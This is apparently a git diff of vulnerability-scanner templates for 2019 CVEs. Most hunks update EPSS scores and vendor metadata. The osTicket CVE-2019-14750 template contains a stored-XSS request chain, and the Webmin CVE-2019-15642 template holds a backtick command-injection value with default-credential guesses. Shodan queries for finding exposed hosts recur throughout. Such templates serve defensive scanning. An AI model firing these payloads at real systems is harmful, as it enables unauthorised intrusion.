cwe-id: CWE-79
epss-score: 0.1896
cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95583
metadata:
max-request: 2
shodan-query: http.html:"pCOWeb"
diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml
index 19a7ccf520..e021cdea92 100644
--- a/http/cves/2019/CVE-2019-11510.yaml
+++ b/http/cves/2019/CVE-2019-11510.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 10
cve-id: CVE-2019-11510
cwe-id: CWE-22
- epss-score: 0.97317
+ epss-score: 0.97289
cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:*
+ epss-percentile: 0.99788
metadata:
max-request: 1
vendor: pulsesecure
diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml
index 5feeaadf84..cd182ab915 100644
--- a/http/cves/2019/CVE-2019-11580.yaml
+++ b/http/cves/2019/CVE-2019-11580.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-11580
- epss-score: 0.97491
+ epss-score: 0.97501
cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99963
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml
index 821ebf58e4..32f731b520 100644
--- a/http/cves/2019/CVE-2019-11581.yaml
+++ b/http/cves/2019/CVE-2019-11581.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-74
epss-score: 0.97434
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99907
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml
index 60d46b7ecf..6bc23f90c3 100644
--- a/http/cves/2019/CVE-2019-11869.yaml
+++ b/http/cves/2019/CVE-2019-11869.yaml
@@ -24,6 +24,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00321
cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.66852
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml
index 98de63aa1a..c59f7cf742 100644
--- a/http/cves/2019/CVE-2019-12276.yaml
+++ b/http/cves/2019/CVE-2019-12276.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-12276
cwe-id: CWE-22
- epss-score: 0.96045
+ epss-score: 0.96216
cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:*
+ epss-percentile: 0.99307
metadata:
max-request: 1
vendor: grandnode
diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml
index 43dfc2759e..89e2a7c560 100644
--- a/http/cves/2019/CVE-2019-12314.yaml
+++ b/http/cves/2019/CVE-2019-12314.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12314
cwe-id: CWE-22
- epss-score: 0.22126
+ epss-score: 0.23499
cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:*
+ epss-percentile: 0.95935
metadata:
max-request: 1
vendor: deltek
diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml
index d7205f4479..b96f0d1314 100644
--- a/http/cves/2019/CVE-2019-12461.yaml
+++ b/http/cves/2019/CVE-2019-12461.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00269
cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:*
+ epss-percentile: 0.63646
metadata:
max-request: 1
vendor: webport
diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml
index 0adba67d3e..e8be46f619 100644
--- a/http/cves/2019/CVE-2019-12581.yaml
+++ b/http/cves/2019/CVE-2019-12581.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00642
cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.7661
metadata:
max-request: 1
shodan-query: http.title:"ZyWall"
diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml
index 77f56eadf5..0de42fd24e 100644
--- a/http/cves/2019/CVE-2019-12583.yaml
+++ b/http/cves/2019/CVE-2019-12583.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-425
epss-score: 0.00481
cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72824
metadata:
max-request: 1
vendor: zyxel
diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml
index 27a844537c..cd97bb169b 100644
--- a/http/cves/2019/CVE-2019-12593.yaml
+++ b/http/cves/2019/CVE-2019-12593.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-12593
cwe-id: CWE-22
- epss-score: 0.12314
+ epss-score: 0.13201
cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94827
metadata:
max-request: 2
google-query: Powered By IceWarp 10.4.4
diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml
index de6c8d5f3b..c3e3962566 100644
--- a/http/cves/2019/CVE-2019-12616.yaml
+++ b/http/cves/2019/CVE-2019-12616.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-352
epss-score: 0.00989
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.81614
metadata:
max-request: 1
vendor: phpmyadmin
diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml
index ee9ecbb4d4..585bde5909 100644
--- a/http/cves/2019/CVE-2019-12725.yaml
+++ b/http/cves/2019/CVE-2019-12725.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12725
cwe-id: CWE-78
- epss-score: 0.96689
+ epss-score: 0.96479
cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99394
metadata:
max-request: 1
vendor: zeroshell
diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml
index d1f1e649e7..8d06c9c0ea 100644
--- a/http/cves/2019/CVE-2019-12962.yaml
+++ b/http/cves/2019/CVE-2019-12962.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.20689
cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95731
metadata:
max-request: 1
shodan-query: http.html:LiveZilla
diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml
index ad3aa9a0fe..b2cf874532 100644
--- a/http/cves/2019/CVE-2019-12985.yaml
+++ b/http/cves/2019/CVE-2019-12985.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97433
cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99906
metadata:
max-request: 2
shodan-query: http.title:"Citrix SD-WAN"
diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml
index e6b9d5dac3..d764b34ed0 100644
--- a/http/cves/2019/CVE-2019-12986.yaml
+++ b/http/cves/2019/CVE-2019-12986.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97433
cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99906
metadata:
max-request: 2
shodan-query: http.title:"Citrix SD-WAN"
diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml
index 9ffe3d34cf..daa9bf85a0 100644
--- a/http/cves/2019/CVE-2019-12987.yaml
+++ b/http/cves/2019/CVE-2019-12987.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97433
cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99906
metadata:
max-request: 2
shodan-query: http.title:"Citrix SD-WAN"
diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml
index b33fda2f7e..04576616b1 100644
--- a/http/cves/2019/CVE-2019-12988.yaml
+++ b/http/cves/2019/CVE-2019-12988.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97433
cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99906
metadata:
max-request: 2
shodan-query: http.title:"Citrix SD-WAN"
diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml
index 05a269f611..f205671200 100644
--- a/http/cves/2019/CVE-2019-12990.yaml
+++ b/http/cves/2019/CVE-2019-12990.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.95724
cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99172
metadata:
max-request: 3
shodan-query: http.title:"Citrix SD-WAN"
diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml
index 5a8f83ff5d..840ed7884f 100644
--- a/http/cves/2019/CVE-2019-13101.yaml
+++ b/http/cves/2019/CVE-2019-13101.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-306
epss-score: 0.03717
cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:*
+ epss-percentile: 0.90578
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml
index 2ab2ded2f7..7dfca65348 100644
--- a/http/cves/2019/CVE-2019-13392.yaml
+++ b/http/cves/2019/CVE-2019-13392.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0014
cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:*
+ epss-percentile: 0.4905
metadata:
max-request: 1
vendor: mindpalette
diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml
index 31a3188679..a499f582d2 100644
--- a/http/cves/2019/CVE-2019-13396.yaml
+++ b/http/cves/2019/CVE-2019-13396.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02107
cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87729
metadata:
max-request: 2
vendor: getflightpath
diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml
index afbf01c4e2..c71d33fe3b 100644
--- a/http/cves/2019/CVE-2019-13462.yaml
+++ b/http/cves/2019/CVE-2019-13462.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.41054
cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96803
metadata:
max-request: 1
vendor: lansweeper
diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml
index 213178fb2c..e4c70cd572 100644
--- a/http/cves/2019/CVE-2019-14205.yaml
+++ b/http/cves/2019/CVE-2019-14205.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.06333
cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92717
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml
index 190145febb..b6d053a15a 100644
--- a/http/cves/2019/CVE-2019-14223.yaml
+++ b/http/cves/2019/CVE-2019-14223.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00188
cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:*
+ epss-percentile: 0.55496
metadata:
max-request: 1
vendor: alfresco
diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml
index c5d9e8b735..7d18a19ed0 100644
--- a/http/cves/2019/CVE-2019-14251.yaml
+++ b/http/cves/2019/CVE-2019-14251.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01349
cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:*
+ epss-percentile: 0.84467
metadata:
max-request: 2
vendor: temenos
diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml
index 4020a1c7a4..16b6a85934 100644
--- a/http/cves/2019/CVE-2019-14312.yaml
+++ b/http/cves/2019/CVE-2019-14312.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02327
cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:*
+ epss-percentile: 0.88328
metadata:
max-request: 1
vendor: aptana
diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml
index 453b69c568..c791fcad4e 100644
--- a/http/cves/2019/CVE-2019-14322.yaml
+++ b/http/cves/2019/CVE-2019-14322.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-14322
cwe-id: CWE-22
- epss-score: 0.50941
+ epss-score: 0.58463
cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97287
metadata:
max-request: 3
vendor: palletsprojects
diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml
index 4c377411e0..2c0176683a 100644
--- a/http/cves/2019/CVE-2019-14470.yaml
+++ b/http/cves/2019/CVE-2019-14470.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14470
cwe-id: CWE-79
- epss-score: 0.82279
+ epss-score: 0.78633
cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:*
+ epss-percentile: 0.97832
metadata:
max-request: 1
vendor: instagram-php-api_project
diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml
index 819c20d58f..a15fba863d 100644
--- a/http/cves/2019/CVE-2019-14530.yaml
+++ b/http/cves/2019/CVE-2019-14530.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2019-14530
cwe-id: CWE-22
- epss-score: 0.86742
+ epss-score: 0.83277
cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97995
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml
index b46cab3224..253602bf97 100644
--- a/http/cves/2019/CVE-2019-14696.yaml
+++ b/http/cves/2019/CVE-2019-14696.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00776
cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:*
+ epss-percentile: 0.79096
metadata:
max-request: 1
vendor: open-school
diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml
index 29195efb6f..072e34723a 100644
--- a/http/cves/2019/CVE-2019-14750.yaml
+++ b/http/cves/2019/CVE-2019-14750.yaml
@@ -1,76 +1,84 @@
-id: CVE-2019-14750
-
-info:
- name: osTicket < 1.12.1 - Cross-Site Scripting
- author: TenBird
- severity: medium
- description: |
- An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions.
- reference:
- - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html
- - https://nvd.nist.gov/vuln/detail/CVE-2019-14750
- classification:
- cve-id: CVE-2019-14750
- metadata:
- max-request: 4
- shodan-query: title:"osTicket"
- tags: cve,cve2019,osticket,xss,intrusive
-
-variables:
- user_name: "{{to_lower(rand_text_alphanumeric(6))}}"
- user_pass: "{{rand_text_alphanumeric(12)}}"
- user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
-
-http:
- - raw:
- - |
- POST /upload/setup/install.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- s=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo
-
- - |
- GET /upload/scp/login.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- - |
- POST /upload/scp/login.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- __CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1
-
- - |
- GET /upload/scp/settings.php HTTP/1.1
- Host: {{Hostname}}
-
- redirects: true
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: body_4
- words:
- - ''
- - 'getConfig().resolve'
- condition: and
-
- - type: word
- part: header_4
- words:
- - text/html
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- name: csrftoken
- part: body
- group: 1
- regex:
- - '__CSRFToken__" value="(.*?)"'
- internal: true
+id: CVE-2019-14750
+
+info:
+ name: osTicket < 1.12.1 - Cross-Site Scripting
+ author: TenBird
+ severity: medium
+ description: |
+ An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions.
+ reference:
+ - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-14750
+ - http://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html
+ - https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12
+ - https://github.com/osTicket/osTicket/releases/tag/v1.10.7
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-14750
+ cwe-id: CWE-79
+ epss-score: 0.05309
+ cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
+ epss-percentile: 0.92085
+ metadata:
+ max-request: 4
+ shodan-query: title:"osTicket"
+ vendor: osticket
+ product: osticket
+ tags: packetstorm,cve,cve2019,osticket,xss,intrusive
+variables:
+ user_name: "{{to_lower(rand_text_alphanumeric(6))}}"
+ user_pass: "{{rand_text_alphanumeric(12)}}"
+ user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
+
+http:
+ - raw:
+ - |
+ POST /upload/setup/install.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ s=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo
+ - |
+ GET /upload/scp/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ - |
+ POST /upload/scp/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ __CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1
+ - |
+ GET /upload/scp/settings.php HTTP/1.1
+ Host: {{Hostname}}
+
+ redirects: true
+ cookie-reuse: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_4
+ words:
+ - ''
+ - 'getConfig().resolve'
+ condition: and
+
+ - type: word
+ part: header_4
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ name: csrftoken
+ part: body
+ group: 1
+ regex:
+ - '__CSRFToken__" value="(.*?)"'
+ internal: true
diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml
index a8c43dc3be..554a1c8ee9 100644
--- a/http/cves/2019/CVE-2019-14789.yaml
+++ b/http/cves/2019/CVE-2019-14789.yaml
@@ -17,12 +17,13 @@ info:
cve-id: CVE-2019-14789
cwe-id: CWE-79
epss-score: 0.00125
- cpe: cpe:2.3:a:custom_404_pro_project:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:*
+ cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.46223
metadata:
max-request: 2
verified: true
framework: wordpress
- vendor: custom_404_pro_project
+ vendor: kunalnagar
product: custom_404_pro
tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss
diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml
index 572ce0473e..37f4063207 100644
--- a/http/cves/2019/CVE-2019-14974.yaml
+++ b/http/cves/2019/CVE-2019-14974.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00217
cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:*
+ epss-percentile: 0.59028
metadata:
max-request: 1
vendor: sugarcrm
diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml
index d1fa4e3a85..0744c79dfa 100644
--- a/http/cves/2019/CVE-2019-15043.yaml
+++ b/http/cves/2019/CVE-2019-15043.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2019-15043
cwe-id: CWE-306
- epss-score: 0.16944
+ epss-score: 0.27328
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96168
metadata:
max-request: 1
shodan-query: title:"Grafana"
diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml
index 03654a4898..83e0120ad3 100644
--- a/http/cves/2019/CVE-2019-15107.yaml
+++ b/http/cves/2019/CVE-2019-15107.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-15107
cwe-id: CWE-78
- epss-score: 0.97514
+ epss-score: 0.97528
cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99981
metadata:
max-request: 1
vendor: webmin
diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml
index bb39d34585..46802682b8 100644
--- a/http/cves/2019/CVE-2019-15501.yaml
+++ b/http/cves/2019/CVE-2019-15501.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00303
cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:*
+ epss-percentile: 0.65819
metadata:
max-request: 1
shodan-query: http.html:"LISTSERV"
diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml
index e0aa449417..6b0e93bcd5 100644
--- a/http/cves/2019/CVE-2019-15642.yaml
+++ b/http/cves/2019/CVE-2019-15642.yaml
@@ -9,12 +9,24 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-15642
- https://github.com/jas502n/CVE-2019-15642
+ - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index
+ - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37
+ - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-15642
+ cwe-id: CWE-94
+ epss-score: 0.26994
+ cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96156
metadata:
max-request: 4
shodan-query: title:"Webmin"
verified: true
+ vendor: webmin
+ product: webmin
tags: cve,cve2019,webmin,rce
-
variables:
cmd: '`id`'
@@ -30,7 +42,6 @@ http:
Accept-Encoding: gzip, deflate
user={{username}}&pass={{password}}
-
- |
POST /rpc.cgi HTTP/1.1
Host: {{Hostname}}
@@ -48,10 +59,10 @@ http:
password:
- admin
- root
-
stop-at-first-match: true
host-redirects: true
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: regex
diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml
index 718229e325..8f53324c59 100644
--- a/http/cves/2019/CVE-2019-15713.yaml
+++ b/http/cves/2019/CVE-2019-15713.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00101
cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40822
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml
index f978a0c04f..41509b3dec 100644
--- a/http/cves/2019/CVE-2019-15811.yaml
+++ b/http/cves/2019/CVE-2019-15811.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00376
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6932
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml
index 8e2c060ef2..d24e339184 100644
--- a/http/cves/2019/CVE-2019-15858.yaml
+++ b/http/cves/2019/CVE-2019-15858.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-306
epss-score: 0.02782
cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.8928
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml
index f282beb1c4..5f5466dfce 100644
--- a/http/cves/2019/CVE-2019-15859.yaml
+++ b/http/cves/2019/CVE-2019-15859.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-15859
cwe-id: CWE-200
- epss-score: 0.08759
+ epss-score: 0.12379
cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94685
metadata:
max-request: 1
vendor: socomec
diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml
index d607f21e10..3d435e85b9 100644
--- a/http/cves/2019/CVE-2019-15889.yaml
+++ b/http/cves/2019/CVE-2019-15889.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-15889
cwe-id: CWE-79
- epss-score: 0.04127
+ epss-score: 0.0427
cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91187
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml
index 5f4cceb6f5..1a8d9db84f 100644
--- a/http/cves/2019/CVE-2019-16057.yaml
+++ b/http/cves/2019/CVE-2019-16057.yaml
@@ -15,10 +15,15 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16057
cwe-id: CWE-78
+ epss-score: 0.97548
+ cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99991
metadata:
max-request: 1
verified: true
shodan-query: html:"ShareCenter"
+ vendor: dlink
+ product: dns-320_firmware
tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink
http:
diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml
index 613cbba062..918c889739 100644
--- a/http/cves/2019/CVE-2019-16097.yaml
+++ b/http/cves/2019/CVE-2019-16097.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2019-16097
cwe-id: CWE-862
- epss-score: 0.96766
+ epss-score: 0.96909
cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:*
+ epss-percentile: 0.99592
